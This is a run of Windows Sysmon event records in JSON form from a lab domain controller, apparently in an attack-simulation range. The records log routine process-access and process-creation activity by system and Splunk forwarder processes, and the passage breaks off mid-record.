{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6551,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6552,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.932\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-00102C640C00}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.932","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-00102C640C00}","TargetProcessId":"5080","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6553,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.073\r\nSourceProcessGUID: {A837DB8D-0461-5F25-0000-00102C640C00}\r\nSourceProcessId: 5080\r\nSourceThreadId: 2944\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.073","SourceProcessGUID":"{A837DB8D-0461-5F25-0000-00102C640C00}","SourceProcessId":"5080","SourceThreadId":"2944","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6554,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.605\r\nProcessGuid: {A837DB8D-0462-5F25-0000-001011660C00}\r\nProcessId: 3792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.605","ProcessGuid":"{A837DB8D-0462-5F25-0000-001011660C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6555,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0462-5F25-0000-001011660C00}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program 